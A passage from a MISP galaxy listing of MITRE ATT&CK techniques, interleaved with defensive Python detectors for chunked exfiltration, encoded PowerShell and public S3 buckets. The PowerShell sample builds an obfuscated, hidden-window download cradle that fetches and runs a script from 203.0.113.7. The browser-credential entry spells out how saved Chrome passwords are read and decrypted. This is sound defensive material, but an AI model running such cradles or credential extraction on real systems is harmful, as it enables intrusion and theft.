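    """A well-formed SEQUENCE with a long-form length (210 bytes of INTEGERs)."""
    body = b"\x02\x01\x01" * 70
    return b"\x30\x81" + bytes([len(body)]) + body


def _armor(raw):
    b64 = base64.b64encode(raw).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return ("-----BEGIN CERTIFICATE-----\n" + "\n".join(lines)
            + "\n-----END CERTIFICATE-----\n")


SAMPLE_CERT_FILE = _armor(_fake_der())
SAMPLE_HIDDEN_PE_FILE = "# shipped as payload.crt\n" + _armor(_fake_pe())

if __name__ == "__main__":
    print(scan_certificate_file(SAMPLE_CERT_FILE))       # ['der-certificate']
    print(scan_certificate_file(SAMPLE_HIDDEN_PE_FILE))  # ['pe-executable']
```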

The tag is: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"

Table 5513. Table References

Links

https://attack.mitre.org/techniques/T1140

https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2017/03/new-targeted-attack-saudi-arabia-government/

https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/

https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/

Obtain domain/IP registration information - T1251

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1251).

For a computing resource to be accessible to the public, domain names and IP addresses must be registered with an authorized organization. (Citation: Google Domains WHOIS) (Citation: FunAndSun2012) (Citation: Scasny2015)

The tag is: misp-galaxy:mitre-attack-pattern="Obtain domain/IP registration information - T1251"

Table 5514. Table References

Links

https://attack.mitre.org/techniques/T1251

Assign KITs/KIQs into categories - T1228

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1228).

Leadership organizes Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) into three types of categories and creates more if necessary. An example of a description of key players KIT would be when an adversary assesses the cyber defensive capabilities of a nation-state threat actor. (Citation: Herring1999)

The tag is: misp-galaxy:mitre-attack-pattern="Assign KITs/KIQs into categories - T1228"

Table 5515. Table References

Links

https://attack.mitre.org/techniques/T1228

Receive operator KITs/KIQs tasking - T1235

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1235).

Analysts may receive intelligence requirements from leadership and begin the research process to satisfy a requirement. Part of this process may include delineating between needs and wants and thinking through all the possible aspects associated with satisfying a requirement. (Citation: FBIIntelligencePrimer)

The tag is: misp-galaxy:mitre-attack-pattern="Receive operator KITs/KIQs tasking - T1235"

Table 5516. Table References

Links

https://attack.mitre.org/techniques/T1235

Data Transfer Size Limits - T1030

An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.
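A per-transfer size threshold alone is blind to this: a 6 MB upload split into twelve 512 KB pieces never trips a 1 MB alert. The following Python is an added example, not code from the MISP galaxy or its sources, that looks for the repetition instead: many equally sized, sub-threshold outbound transfers to one destination within a time window. The flow records are constructed (10.0.0.5 uploading to 203.0.113.7 is the planted pattern).

```python
"""Spot exfiltration split into equal chunks that each stay under a size alert.

Added example, not code from the MISP galaxy or MITRE ATT&CK. A single
per-transfer threshold misses a 6 MB upload sent as twelve 512 KB pieces; this
looks instead for repeated, identically sized outbound transfers to one
destination inside a time window. The flow records are constructed.
"""
from collections import Counter, defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    ts: float       # seconds since epoch
    src: str
    dst: str
    dport: int
    out_bytes: int  # bytes sent by src


def max_within_window(timestamps, window):
    """Largest number of sorted timestamps that fall inside any span of `window` seconds."""
    best = j = 0
    for i, t in enumerate(timestamps):
        while timestamps[j] < t - window:
            j += 1
        best = max(best, i - j + 1)
    return best


def find_chunked_transfers(flows, per_transfer_alert=1_000_000, min_chunks=8, window=3600):
    """One finding per (src, dst, port) whose sub-threshold transfers repeat the
    same size at least `min_chunks` times within `window` seconds."""
    groups = defaultdict(list)
    for f in flows:
        if f.out_bytes < per_transfer_alert:   # the ones the size alert never sees
            groups[(f.src, f.dst, f.dport)].append(f)
    findings = []
    for (src, dst, dport), fl in sorted(groups.items()):
        size, _ = Counter(f.out_bytes for f in fl).most_common(1)[0]
        ts = sorted(f.ts for f in fl if f.out_bytes == size)
        burst = max_within_window(ts, window)
        if burst >= min_chunks:
            findings.append({
                "src": src, "dst": dst, "dport": dport,
                "chunk_size": size, "chunks": burst,
                "total_bytes": size * burst,
            })
    return findings


def sample_flows():
    """Constructed flows: twelve 512 KB uploads a minute apart plus ordinary traffic."""
    base = 1_700_000_000
    chunks = [Flow(base + 60 * i, "10.0.0.5", "203.0.113.7", 443, 524_288) for i in range(12)]
    noise = [
        Flow(base + 5, "10.0.0.5", "198.51.100.9", 443, 1_200),
        Flow(base + 9, "10.0.0.5", "198.51.100.9", 443, 3_400),
        Flow(base + 30, "10.0.0.5", "198.51.100.9", 443, 1_200),
        Flow(base + 95, "10.0.0.8", "203.0.113.7", 443, 2_000_000),  # over threshold: existing alert
    ]
    return chunks + noise


if __name__ == "__main__":
    for finding in find_chunked_transfers(sample_flows()):
        print(finding)
```

The window matters: the same twelve chunks spread over a day fall under the default limit, so pair this with a per-destination byte total over a longer baseline.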

The tag is: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030"

Table 5517. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1030

Data from Local System - T1005

Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.

Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.

The tag is: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005"

Table 5518. Table References

Links

https://attack.mitre.org/techniques/T1005

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/show_protocols_through_showmon.html#wp2760878733

https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits

https://www.us-cert.gov/ncas/alerts/TA18-106A

Exfiltration Over C2 Channel - T1041

Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041"

Table 5519. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1041

Exploitation of Remote Services - T1210

Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.

An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.

There are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services.(Citation: NVD CVE-2014-7169)

Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.

The tag is: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210"

Table 5520. Table References

Links

https://attack.mitre.org/techniques/T1210

https://nvd.nist.gov/vuln/detail/CVE-2014-7169

https://nvd.nist.gov/vuln/detail/CVE-2016-6662

https://nvd.nist.gov/vuln/detail/CVE-2017-0176

https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-microsoft-windows-smb-server-could-allow-for-remote-code-execution/

System Network Configuration Discovery - T1016

Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig/ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).

Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. <code>show ip route</code>, <code>show ip interface</code>).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion)

Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.

The tag is: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016"

Table 5521. Table References

Links

https://attack.mitre.org/techniques/T1016

https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits

https://www.us-cert.gov/ncas/alerts/TA18-106A

Replication Through Removable Media - T1091

Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media’s firmware itself.

Mobile devices may also be used to infect PCs with malware if connected via USB.(Citation: Exploiting Smartphone USB) This infection may be achieved using devices (Android, iOS, etc.) and, in some instances, USB charging cables.(Citation: Windows Malware Infecting Android)(Citation: iPhone Charging Cable Hack) For example, when a smartphone is connected to a system, it may appear to be mounted similar to a USB-connected disk drive. If malware that is compatible with the connected system is on the mobile device, the malware could infect the machine (especially if Autorun features are enabled).

The tag is: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091"

Table 5522. Table References

Links

https://attack.mitre.org/techniques/T1091

https://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.226.3427&rep=rep1&type=pdf

https://techcrunch.com/2019/08/12/iphone-charging-cable-hack-computer-def-con/

https://www.computerworld.com/article/2486903/windows-malware-tries-to-infect-android-devices-connected-to-pcs.html

Exploitation for Client Execution - T1203

Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to insecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users expect to see files related to the applications they commonly use to do work, so those applications are a useful target for exploit research and development because of their high utility.

Several types exist:

Browser-based Exploitation

Web browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.

Office Applications

Common office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://attack.mitre.org/techniques/T1566). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.

Common Third-party Applications

Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.

The tag is: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203"

Table 5523. Table References

Links

https://attack.mitre.org/techniques/T1203

Change Default File Association - T1042

When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

System file associations are listed under <code>HKEY_CLASSES_ROOT\.[extension]</code>, for example <code>HKEY_CLASSES_ROOT\.txt</code>. The entries point to a handler for that extension located at <code>HKEY_CLASSES_ROOT\[handler]</code>. The various commands are then listed as subkeys underneath the shell key at <code>HKEY_CLASSES_ROOT\[handler]\shell\[action]\command</code>. For example:

  • <code>HKEY_CLASSES_ROOT\txtfile\shell\open\command</code>

  • <code>HKEY_CLASSES_ROOT\txtfile\shell\print\command</code>

  • <code>HKEY_CLASSES_ROOT\txtfile\shell\printto\command</code>

The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)

The tag is: misp-galaxy:mitre-attack-pattern="Change Default File Association - T1042"

Table 5524. Table References

Links

http://msdn.microsoft.com/en-us/library/bb166549.aspx

https://attack.mitre.org/techniques/T1042

https://capec.mitre.org/data/definitions/556.html

https://docs.microsoft.com/windows-server/administration/windows-commands/assoc

https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd

File and Directory Discovery - T1420

Adversaries may enumerate files and directories or search in specific device locations for desired information within a filesystem. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1420) during automated discovery to shape follow-on behaviors, including deciding if the adversary should fully infect the target and/or attempt specific actions.

On Android, Linux file permissions and SELinux policies typically stringently restrict what can be accessed by apps without taking advantage of a privilege escalation exploit. The contents of the external storage directory are generally visible, which could present concerns if sensitive data is inappropriately stored there. iOS’s security architecture generally restricts the ability to perform any type of [File and Directory Discovery](https://attack.mitre.org/techniques/T1420) without use of escalated privileges.

The tag is: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1420"

Table 5525. Table References

Links

https://attack.mitre.org/techniques/T1420

https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-41.html

Data from Removable Media - T1025

Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.

Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.

The tag is: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025"

Table 5526. Table References

Links

https://attack.mitre.org/techniques/T1025

Exfiltration Over Physical Medium - T1052

Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Physical Medium - T1052"

Table 5527. Table References

Links

https://attack.mitre.org/techniques/T1052

Data from Configuration Repository - T1602

Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.

Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Data from Configuration Repository - T1602"

Table 5528. Table References

Links

https://attack.mitre.org/techniques/T1602

https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3

https://us-cert.cisa.gov/ncas/alerts/TA17-156A

https://www.us-cert.gov/ncas/alerts/TA18-106A

Obfuscated Files or Information - T1027

Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.

Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user’s action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript.

Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)

Adversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017)
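Detection content written against the strings <code>powershell</code> or <code>DownloadString</code> misses the two cheapest tricks above unless the command line is normalised first. The Python below is an added example, not code from the MISP galaxy or its sources: it removes cmd.exe caret escapes and decodes <code>-EncodedCommand</code> payloads (base64 of UTF-16LE), including the abbreviated flag spellings PowerShell accepts, over a constructed command line.

```python
"""Undo two common command-line obfuscations before matching detections.

Added example, not code from the MISP galaxy or MITRE ATT&CK. It strips
cmd.exe caret escapes (p^o^w^e^r^s^h^e^l^l) and decodes PowerShell
-EncodedCommand payloads (base64 of UTF-16LE), accepting the abbreviated flag
forms PowerShell itself accepts (-e, -ec, -en, -enc, ...). The sample command
line is constructed.
"""
import base64
import re

# PowerShell resolves any unambiguous prefix of -EncodedCommand; -ec is a documented alias.
ENCODED_FLAGS = {"encodedcommand"[:n] for n in range(1, len("encodedcommand") + 1)} | {"ec"}
B64 = re.compile(r"^[A-Za-z0-9+/]+=*$")


def strip_cmd_carets(s: str) -> str:
    """cmd.exe treats ^ as an escape for the next character; ^^ yields a literal ^."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "^" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the line carries an -EncodedCommand argument, else None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.startswith("-") and tok[1:].lower() in ENCODED_FLAGS and B64.match(tokens[i + 1]):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def normalize(cmdline: str) -> dict:
    """Deobfuscate one process command line; `script` is what the engine really runs."""
    plain = strip_cmd_carets(cmdline)
    decoded = decode_encoded_command(plain)
    return {
        "cmdline": plain,
        "carets_removed": plain != cmdline,
        "script": decoded if decoded is not None else plain,
        "was_encoded": decoded is not None,
    }


def sample_cmdline() -> str:
    """Constructed: caret-obfuscated launcher plus an encoded download cradle."""
    script = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')"
    enc = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return "cmd.exe /c p^o^w^e^r^s^h^e^l^l -NoP -W Hidden -enc " + enc


if __name__ == "__main__":
    print(normalize(sample_cmdline()))
```

Run the detection rules over <code>script</code> rather than the raw command line; PowerShell Script Block Logging (event 4104) records the decoded content as well, which is the more reliable source when it is enabled.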

The tag is: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"

Table 5529. Table References

Links

https://attack.mitre.org/techniques/T1027

https://github.com/danielbohannon/Revoke-Obfuscation

https://github.com/itsreallynick/office-crackros

https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/

https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html

https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/

https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdf

https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/

https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/

Communication Through Removable Media - T1092

Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.

The tag is: misp-galaxy:mitre-attack-pattern="Communication Through Removable Media - T1092"

Table 5530. Table References

Links

https://attack.mitre.org/techniques/T1092

Modify Cached Executable Code - T1403

ART (the Android Runtime) compiles optimized code on the device itself to improve performance. An adversary may be able to use escalated privileges to modify the cached code in order to hide malicious behavior. Since the code is compiled on the device, it may not receive the same level of integrity checks that are provided to code running in the system partition.(Citation: Sabanal-ART)

The tag is: misp-galaxy:mitre-attack-pattern="Modify Cached Executable Code - T1403"

Table 5531. Table References

Links

https://attack.mitre.org/techniques/T1403

https://www.blackhat.com/docs/asia-15/materials/asia-15-Sabanal-Hiding-Behind-ART-wp.pdf

Credentials from Web Browsers - T1503

Adversaries may acquire credentials from web browsers by reading files specific to the target browser. (Citation: Talos Olympic Destroyer 2018)

Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.

For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, <code>AppData\Local\Google\Chrome\User Data\Default\Login Data</code>, and executing a SQL query: <code>SELECT action_url, username_value, password_value FROM logins;</code>. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function <code>CryptUnprotectData</code>, which decrypts with a DPAPI key derived from the victim’s logon credentials, so decryption normally has to happen in that user’s security context.(Citation: Microsoft CryptUnprotectData April 2018)

Adversaries have executed similar procedures for common web browsers such as Firefox, Safari, Edge, etc. (Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017)

Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)

After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary’s objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).

The tag is: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1503"

Table 5532. Table References

Links

https://attack.mitre.org/techniques/T1503

https://blog.talosintelligence.com/2018/02/olympic-destroyer.html

https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata

https://github.com/putterpanda/mimikittenz

https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html

https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign

Data from Cloud Storage - T1530

Adversaries may access data from cloud storage.

Many IaaS providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. Similarly, SaaS enterprise platforms such as Office 365 and Google Workspace provide cloud-based document storage to users through services such as OneDrive and Google Drive, while SaaS application providers such as Slack, Confluence, Salesforce, and Dropbox may provide cloud storage solutions as a peripheral or primary use case of their platform.

In some cases, as with IaaS-based cloud storage, there exists no overarching application (such as SQL or Elasticsearch) through which to interact with the stored objects: instead, data from these solutions is retrieved directly through the [Cloud API](https://attack.mitre.org/techniques/T1059/009). In SaaS applications, adversaries may be able to collect this data directly from APIs or backend cloud storage objects, rather than through their front-end application or interface (i.e., [Data from Information Repositories](https://attack.mitre.org/techniques/T1213)).

Adversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) There have been numerous incidents where cloud storage has been improperly secured, typically by unintentionally allowing public access to unauthenticated users, by granting overly broad access to all users, or even by granting access to anonymous principals outside the control of the Identity and Access Management system, without any user permissions being required.
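Whether an S3 bucket is actually public is decided by the bucket policy statements and the Block Public Access settings together. The Python below is an added example, not code from the MISP galaxy or its sources: it parses a constructed bucket policy, reports Allow statements that grant watched S3 actions to an anonymous principal (noting whether a Condition narrows them), and drops them when RestrictPublicBuckets is set, since S3 then ignores public policies for principals outside the account. The policy, account ID and settings are constructed; the watched action list is an assumption.

```python
"""Find bucket-policy statements that open an S3 bucket to anyone.

Added example, not code from the MISP galaxy or MITRE ATT&CK. The policy and
the Block Public Access settings below are constructed; on a real account they
come from get-bucket-policy and get-public-access-block. An Allow statement
whose Principal is "*" (or {"AWS": "*"}) is public; a Condition narrows it but
still deserves a look, and RestrictPublicBuckets makes S3 ignore such
statements for anyone outside the account.
"""
import fnmatch
import json

WATCHED = ("s3:GetObject", "s3:ListBucket", "s3:PutObject", "s3:DeleteObject")  # assumption


def _as_list(x):
    return x if isinstance(x, list) else [x]


def _principals(p):
    if p == "*":
        return ["*"]
    if isinstance(p, dict):
        return _as_list(p.get("AWS", []))
    return []


def _matches(action_pattern, action):
    # IAM action patterns are case-insensitive globs such as "s3:Get*" or "*".
    return fnmatch.fnmatchcase(action.lower(), action_pattern.lower())


def public_statements(policy: dict):
    findings = []
    for st in policy.get("Statement", []):
        if st.get("Effect") != "Allow" or "*" not in _principals(st.get("Principal")):
            continue
        granted = sorted({w for w in WATCHED
                          for pat in _as_list(st.get("Action", [])) if _matches(pat, w)})
        if granted:
            findings.append({"sid": st.get("Sid", ""), "actions": granted,
                             "resources": _as_list(st.get("Resource", [])),
                             "conditional": "Condition" in st})
    return findings


def effective_public_statements(policy: dict, public_access_block: dict):
    """Public statements S3 will actually honour given the block settings."""
    if public_access_block.get("RestrictPublicBuckets"):
        return []
    return public_statements(policy)


SAMPLE_POLICY = json.loads(r'''{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": ["s3:GetObject"], "Resource": "arn:aws:s3:::example-backups/*"},
    {"Sid": "BackupRole", "Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::123456789012:role/backup"},
     "Action": "s3:*", "Resource": ["arn:aws:s3:::example-backups", "arn:aws:s3:::example-backups/*"]},
    {"Sid": "VpcOnly", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": "s3:Get*", "Resource": "arn:aws:s3:::example-backups/*",
     "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-0123456789abcdef0"}}},
    {"Sid": "DenyPlaintext", "Effect": "Deny", "Principal": "*", "Action": "s3:*",
     "Resource": "arn:aws:s3:::example-backups/*",
     "Condition": {"Bool": {"aws:SecureTransport": "false"}}}
  ]
}''')

# Constructed block settings; all four true is what new buckets get by default.
SAMPLE_PAB_OPEN = {"BlockPublicAcls": False, "IgnorePublicAcls": False,
                   "BlockPublicPolicy": False, "RestrictPublicBuckets": False}
SAMPLE_PAB_LOCKED = {k: True for k in SAMPLE_PAB_OPEN}


if __name__ == "__main__":
    print(effective_public_statements(SAMPLE_POLICY, SAMPLE_PAB_OPEN))
```

Bucket ACLs are a second, independent path to the same exposure and are not modelled here; IgnorePublicAcls is the setting that neutralises them.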

This open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017)(Citation: Rclone-mega-extortion_05_2021)

Adversaries may also obtain then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects.

The tag is: misp-galaxy:mitre-attack-pattern="Data from Cloud Storage - T1530"

Table 5533. Table References

Links

https://attack.mitre.org/techniques/T1530

https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/

https://cloud.google.com/storage/docs/best-practices

https://docs.microsoft.com/en-us/azure/storage/common/storage-security-guide

https://redcanary.com/blog/rclone-mega-extortion/

https://www.hipaajournal.com/47gb-medical-records-unsecured-amazon-s3-bucket/

https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia

https://www.wired.com/story/magecart-amazon-cloud-hacks/

Indicator Removal on Host - T1630

Adversaries may delete, alter, or hide generated artifacts on a device, including files, jailbreak status, or the malicious application itself. These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This may compromise the integrity of mobile security solutions by causing notable events or information to go unreported.

The tag is: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1630"

Table 5534. Table References

Links

https://attack.mitre.org/techniques/T1630

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-43.html

File and Directory Discovery - T1083

